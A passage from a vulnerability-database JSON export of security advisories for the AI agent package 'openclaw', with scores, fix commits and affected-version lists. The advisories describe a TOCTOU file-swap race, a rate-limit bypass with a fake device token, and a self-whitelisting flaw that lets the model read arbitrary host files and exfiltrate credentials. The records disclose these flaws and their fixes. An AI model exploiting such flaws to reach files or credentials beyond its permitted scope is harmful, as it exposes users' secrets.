window.\n\nStill, this was a real TOCTOU boundary bug in code that is supposed to reason about workspace-local script files before execution. A file identity that passed the initial boundary validation could differ from the identity that was later read for preflight analysis.\n\n## Technical Details\n\nThe vulnerable flow performed separate path validation and file reads in `validateScriptFileForShellBleed`. Because the read was path-based, an attacker with write access to the workspace path could race replacement of the target after validation but before preflight read.\n\n## Fix\n\nPR #62333 replaced the check-then-read flow with a pinned safe-open/read path using the shared `readFileWithinRoot` helper. The fixed path performs boundary verification around the opened file identity and avoids relying on a mutable pathname for the final preflight read. Regression tests cover both pre-open and post-open swap windows.\n\n## Fix Commit(s)\n\n- `b024fae9e5df43e9b69b2daebb72be3469d52e91` (`fix(exec): replace TOCTOU check-then-read with atomic pinned-fd open in script preflight [AI]`)\n- PR: #62333\n\n## Release Process Note\n\nThe fix first shipped in `v2026.4.10`. Users should upgrade to `openclaw` `2026.4.10` or newer; the latest npm release already includes the fix.\n\n## Credits\n\nThanks to @kikayli for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43529", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01547", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02173", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02192", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43529" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/62333", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/62333" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43529", "reference_id": "CVE-2026-43529", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43529" }, { "reference_url": "https://github.com/advisories/GHSA-gj9q-8w99-mp8j", "reference_id": "GHSA-gj9q-8w99-mp8j", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gj9q-8w99-mp8j" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator", "reference_id": "openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator", "reference_type": "", "scores": [ { "value": "2.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43529", "GHSA-gj9q-8w99-mp8j" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x2ru-ydpv-f3ah" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90206?format=api", "vulnerability_id": "VCID-x4hn-ygbg-mkep", "summary": "OpenClaw: Fake DeviceToken Bypasses Shared Auth Rate Limiting\n## Summary\nFake DeviceToken Bypasses Shared Auth Rate Limiting\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real in shipped mixed WS auth flow, but practical risk is mostly weak shared-password deployments since strong shared tokens remain non-bruteforceable.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `af0c0862f22ca4492406a3103d05e3628f94cbe9` — 2026-03-31T09:08:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n\nOpenClaw thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41333", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23481", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23421", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23468", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41333" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken" }, { "reference_url": "https://github.com/advisories/GHSA-6p8r-6m93-557f", "reference_id": "GHSA-6p8r-6m93-557f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6p8r-6m93-557f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41333", "GHSA-6p8r-6m93-557f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x4hn-ygbg-mkep" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90028?format=api", "vulnerability_id": "VCID-x794-wfnf-1ugf", "summary": "OpenClaw: Self-Whitelisting in appendLocalMediaParentRoots Allows Arbitrary File Read & Credential Exfiltration\n## Summary\nMedia Local Roots Self-Whitelisting in `appendLocalMediaParentRoots` Allows Model-Initiated Arbitrary Host File Read and Credential Exfiltration\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still self-whitelists media parent dirs in src/media/local-roots.ts, but only after config already permits tool-fs root expansion, so the impact is narrower than the default-critical framing.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `1ca4261d7e055d0be141ed79ebb1365d0fbc7364` — 2026-03-30T17:15:03+01:00\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf" }, { "reference_url": "https://github.com/advisories/GHSA-57gh-m6rq-54cf", "reference_id": "GHSA-57gh-m6rq-54cf", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-57gh-m6rq-54cf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-57gh-m6rq-54cf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x794-wfnf-1ugf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89234?format=api", "vulnerability_id": "VCID-x7uw-s9a6-fybd", "summary": "OpenClaw: `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n## Summary\n`session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped v2026.3.22: non-sandboxed session_status skipped the shared visibility guard, but this is a same-agent 